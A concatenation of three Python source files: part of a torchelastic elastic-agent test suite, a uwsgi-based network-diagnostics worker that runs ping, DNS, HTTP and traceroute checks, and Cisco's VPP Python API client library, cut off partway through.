if role not in role_ranks:
role_ranks[role] = []
role_ranks[role].append(role_rank)
global_ranks = sorted(global_ranks)
self.assertEqual(list(range(0, expected_world_size)), global_ranks)
for role, role_config_info in role_info_dict.items():
self.assertEqual(
list(range(0, role_config_info.role_size)), sorted(role_ranks[role])
)
# Make sure that each agent assigns consecutive ranks to workers.
# The first element of each pair is the global rank and the second
# is the role rank.
for ranks_lst in grouped_ranks.values():
self.verify_ranks_sequential(ranks_lst, 0)
self.verify_ranks_sequential(ranks_lst, 1)
def verify_ranks_sequential(self, ranks_pairs, rank_idx):
ranks = sorted(rank_pair[rank_idx] for rank_pair in ranks_pairs)
start_rank, end_rank = ranks[0], ranks[-1]
self.assertEqual(list(range(start_rank, end_rank + 1)), ranks)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_distributed_sum_heterogenous(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 4
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _distributed_sum, (0,))
for ind in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent, args=(*default_args, ind + 1)
)
procs.append(p)
p.start()
# run one on the main process for debugging
_run_agent(*default_args, 8)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_sad_function(self):
spec = self._get_worker_spec(fn=_sad_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
with self.assertRaises(WorkerGroupFailureException) as cm:
agent.run()
excs = cm.exception.get_worker_exceptions()
self.assertEqual(spec.local_world_size, len(excs))
for e in excs.values():
self.assertTrue(isinstance(e, ProcessRaisedException))
self.assertEqual(WorkerState.FAILED, agent.get_worker_group().state)
self.assertEqual(0, agent._remaining_restarts)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_bipolar_function(self):
spec = self._get_worker_spec(fn=_bipolar_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
with self.assertRaises(WorkerGroupFailureException):
agent.run()
self.assertEqual(WorkerState.FAILED, agent.get_worker_group().state)
self.assertEqual(0, agent._remaining_restarts)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_check_env_function(self):
spec = self._get_worker_spec(fn=_check_env_function, max_restarts=2)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_check_run_id(self):
def return_run_id():
return os.environ["TORCHELASTIC_RUN_ID"]
spec = self._get_worker_spec(fn=return_run_id, max_restarts=0)
agent = LocalElasticAgent(spec, start_method="fork")
ret = agent.run()
for i in range(spec.local_world_size):
self.assertEqual(spec.rdzv_handler.get_run_id(), ret[i])
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_get_worker_return_values(self):
spec = self._get_worker_spec(fn=_return_rank_times, args=(2,))
agent = LocalElasticAgent(spec, start_method="fork")
ret_vals = agent.run()
self.assertEqual(spec.local_world_size, len(ret_vals))
for i in range(spec.local_world_size):
self.assertEqual(i * 2, ret_vals[i])
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_happy(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# run one on the main process for debugging
_run_agent(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,))
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_fault_tolerance(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(nnodes):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# restart odd agents
for i in range(nnodes):
if i % 2 != 0:
procs[i].kill()
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs[i] = p
p.start()
for i in range(nnodes):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_elastic(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
min_size = 1
max_size = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(max_size):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, min_size, max_size, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# kill odd agents
for i in range(max_size):
if i % 2 != 0:
procs[i].kill()
for i in range(max_size):
if i % 2 == 0:
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_torch_rpc(self):
"""
Simple torch rpc example with torchelastic.
Creates two agents (to simulate a two-node job);
each agent runs a single worker. worker0 calls rpc_sync on
worker1.
"""
# TODO upstream this to torch.distributed.rpc so that users do not have
# to redundantly set rank as part of name (e.g. worker0) AND also pass
# it explicitly as an argument to rpc.init_rpc
def init_rpc(name_prefix, backend):
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
rpc.init_rpc(
name=f"{name_prefix}{rank}",
backend=backend,
rank=rank,
world_size=world_size,
)
def worker_0(queue, msg):
init_rpc("worker", BackendType.PROCESS_GROUP)
ret = rpc.rpc_sync(to="worker1", func=echo, args=(msg,))
queue.put(ret)
rpc.shutdown()
def worker_1():
init_rpc("worker", BackendType.PROCESS_GROUP)
rpc.shutdown()
def run_agent(
run_id, etcd_host, etcd_port, start_method, worker_fn, worker_args=()
):
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{etcd_host}:{etcd_port}",
run_id=run_id,
min_nodes=2,
max_nodes=2,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role="test_trainer",
local_world_size=1,
fn=worker_fn,
args=worker_args,
rdzv_handler=rdzv_handler,
max_restarts=3,
monitor_interval=1,
)
agent = LocalElasticAgent(spec, start_method)
agent.run()
run_id = str(uuid.uuid4().int)
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
start_method = "fork"
msg = "hello world"
mp_queue = multiprocessing.get_context(start_method).Queue()
agent0 = multiprocessing.Process(
target=run_agent,
args=(run_id, host, port, start_method, worker_0, (mp_queue, msg)),
)
agent1 = multiprocessing.Process(
target=run_agent, args=(run_id, host, port, start_method, worker_1, ())
)
agent0.start()
agent1.start()
agent0.join()
agent1.join()
self.assertEqual(msg, mp_queue.get())
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_workers_drift_success(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _simulate_work)
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, (10,), 2, "test_trainer", {}, 30),
)
procs.append(p)
p.start()
_run_agent(*default_args, (1,), 2, "test_trainer", {}, 30)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@patch("torchelastic.utils.store.barrier")
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_workers_drift_fail(self, barrier_mock):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _simulate_work)
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, (60,), 2, "test_trainer", {}, 10),
)
procs.append(p)
p.start()
_run_agent(*default_args, (1,), 2, "test_trainer", {}, 10)
barrier_mock.assert_called_once()
@patch("torchelastic.utils.store.barrier")
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_barrier_failed(self, barrier_mock):
barrier_mock.side_effect = RuntimeError("test error")
spec = self._get_worker_spec(fn=_happy_function)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
barrier_mock.assert_called_once()
def test_provide_fn_and_cmd(self):
with self.assertRaises(AssertionError):
self._get_worker_spec(
fn=_bipolar_function, cmd=["test.bin"], max_restarts=2
)
def test_provide_none(self):
with self.assertRaises(AssertionError):
self._get_worker_spec(max_restarts=2)
|
main.py | # pylint: disable=locally-disabled, missing-docstring, import-error, wildcard-import, broad-except
from secrets import token_hex
import json
import threading
import multiprocessing
import uwsgi
from lib.utilities import *
def _browser_request(options, test_data):
"""Execute a browser_request test if all requirements are met."""
url = options.get("url")
if url is not None:
# Remove required arg from options to prevent duplicates.
del options["url"]
try:
test_data["result"] = browser_request(url, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'url' was not given. Please pass the required 'url' option."
def _dns_lookup(options, test_data):
"""Execute a dns_lookup test if all requirements are met."""
qname = options.get("qname")
if qname is not None:
# Remove required arg from options to prevent duplicates.
del options["qname"]
try:
test_data["result"] = dns_lookup(qname, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data["message"] = (
"Required test option of 'qname' was not given. "
"Please pass the required 'qname' option."
)
def _dns_traceroute(options, test_data):
"""Execute a dns_traceroute test if all requirements are met."""
qname = options.get("qname")
if qname is not None:
# Remove required arg from options to prevent duplicates.
del options["qname"]
try:
test_data["result"] = dns_traceroute(qname, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data["message"] = (
"Required test option of 'qname' was not given. "
"Please pass the required 'qname' option."
)
def _http_request(options, test_data):
"""Execute an http_request test if all requirements are met."""
url = options.get("url")
if url is not None:
# Remove required arg from options to prevent duplicates.
del options["url"]
try:
test_data["result"] = http_request(url, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'url' was not given. Please pass the required 'url' option."
def _ping(options, test_data):
"""Execute a ping test if all requirements are met."""
dst = options.get("dst")
if dst is not None:
# Remove required arg from options to prevent duplicates.
del options["dst"]
try:
test_data["result"] = ping(dst, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'dst' was not given. Please pass the required 'dst' option."
def _traceroute(options, test_data):
"""Execute a traceroute test if all requirements are met."""
dst = options.get("dst")
if dst is not None:
# Remove required arg from options to prevent duplicates.
del options["dst"]
try:
test_data["result"] = traceroute(dst, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'dst' was not given. Please pass the required 'dst' option."
def _worker(test):
"""Process pool worker to execute tests."""
# Check if a custom identifier was provided in the test; if not, add one.
test_id = test["options"]["id"] if test["options"].get("id") else token_hex(3)
test_data = {"id": test_id, "failed": True, "message": None, "result": {}}
# Perform tests depending on given test type.
# Parse options and ensure that requirements have been given;
# if not, append an error message to the returned data.
if test["type"] == "browser_request":
_browser_request(test["options"], test_data)
elif test["type"] == "dns_lookup":
_dns_lookup(test["options"], test_data)
elif test["type"] == "dns_traceroute":
_dns_traceroute(test["options"], test_data)
elif test["type"] == "http_request":
_http_request(test["options"], test_data)
elif test["type"] == "traceroute":
_traceroute(test["options"], test_data)
elif test["type"] == "ping":
_ping(test["options"], test_data)
else:
test_data["message"] = "Provided test type does not exist."
return {"type": test["type"], "results": test_data}
def _create_worker_pool(receipt, test_data, max_procs, stop_event):
"""Parse provided test data and ensure that all test options are properly formatted
before passing off to the worker procs in the pool. Once the tests have been completed;
update the UWSGI cache-key with the results.
Args:
receipt (str) : The UWSGI cache-key to append test results to.
test_data (dict) : The tests to execute.
max_procs (int) : The maximum number of parallel processes to be used in the worker pool
stop_event (threading.Event): Event used to stop the daemon thread upon completion.
"""
tests = []
test_status = {"receipt": receipt, "is_running": True, "results": {}}
for (test_type, test_options) in test_data.items():
for options in test_options:
# Ensure that all options are lowercase.
options = {key.lower(): value for key, value in options.items()}
tests.append({"type": test_type, "options": options})
if test_type not in test_status["results"]:
test_status["results"][test_type] = []
uwsgi.cache_update(receipt, json.dumps(test_status), 600, "receipts")
# Execute tests in parallel.
pool = multiprocessing.Pool(min(len(tests), max_procs))
result = pool.map(_worker, tests)
# Wait for ALL results before terminating the pool.
pool.close()
pool.join()
# Parse test results and append them to our test status.
for test in result:
test_status["results"][test["type"]].append(test["results"])
test_status["is_running"] = False
# Update the client's receipt with the current test status including test results.
uwsgi.cache_update(receipt, json.dumps(test_status), 600, "receipts")
# Ensure that the daemon is stopped after cache update.
stop_event.set()
def execute_tests(receipt, test_data, max_procs):
"""This is a glue function where every part of Scouter comes together into one.
Parse and execute tests in a background daemon thread. Pass all data to a worker pool
to perform tests in parallel. Update UWSGI with test results upon completion.
Args:
receipt (str) : The UWSGI cache-key to append test results to.
test_data (dict): The tests to execute.
max_procs (int) : The maximum number of parallel processes to be used in the worker pool.
"""
stop_event = threading.Event()
thread = threading.Thread(
target=_create_worker_pool, args=(receipt, test_data, max_procs, stop_event)
)
thread.daemon = True
thread.start()
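# A hedged usage sketch (not part of the original module): how a request
# handler might hand tests off to execute_tests. The test_data shape below is
# an assumption based on how _create_worker_pool consumes it.
def _example_usage():
    receipt = token_hex(8)
    test_data = {
        "ping": [{"dst": "192.0.2.1"}],
        "dns_lookup": [{"qname": "example.com"}],
    }
    execute_tests(receipt, test_data, max_procs=4)
    # Results arrive asynchronously; poll the "receipts" cache with the
    # receipt key until "is_running" flips to False.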
|
vpp_papi.py | #!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiJSONFiles(object):
@classmethod
def find_api_dir(cls, dirs):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
patterns. Each value in the list will have leading/trailing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir([])
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@classmethod
def process_json_file(cls, apidef_file):
api = json.load(apidef_file)
types = {}
services = {}
messages = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
### OLE FIXME
logging.getLogger(__name__).error(
'Not implemented error for {}'.format(m[0]))
return messages, services
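# A hedged usage sketch (not in the original source): discover API definition
# files and parse them into message/service tables, mirroring what
# VPPApiClient.__init__ does below.
def _load_all_api_definitions():
    messages, services = {}, {}
    for path in VPPApiJSONFiles.find_api_files(patterns='*'):
        with open(path) as f:
            m, s = VPPApiJSONFiles.process_json_file(f)
            messages.update(m)
            services.update(s)
    return messages, services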
class VPPApiClient(object):
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp/api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(
"{}.{}".format(__name__, self.__class__.__name__))
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
m, s = VPPApiJSONFiles.process_json_file(apidef_file)
self.messages.update(m)
self.services.update(s)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
def get_function(self, name):
return getattr(self._api, name)
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
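# ContextId gives each request a process-wide unique context so replies can be
# matched to requests even across forked workers. A minimal sketch of the
# contract (hedged; illustrative only):
#
#   ctx1 = VPPApiClient.get_context()   # e.g. 1
#   ctx2 = VPPApiClient.get_context()   # e.g. 2 -- never repeats ctx1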
def get_type(self, name):
return vpp_get_type(name)
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if do_async:
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n.encode('utf-8'))
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name.encode('utf-8'), pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]).encode('utf-8'))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return False
#
# Look up the message definition and check for a context field.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode the message and return a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
s = 'Calling {}({})'.format(msgdef.name,
','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
self.logger.debug(s)
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while True:
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if not hasattr(r, 'context') or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
self.logger.debug('Return from {!r}'.format(r))
return rl
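# A hedged usage sketch of the sync path (illustrative; 'show_version' is a
# standard VPP API message, but treat the exact names as assumptions here):
#
#   vpp = VPPApiClient(apifiles=files)
#   vpp.connect('example-client')
#   rv = vpp.api.show_version()   # blocks in _call_vpp until the reply
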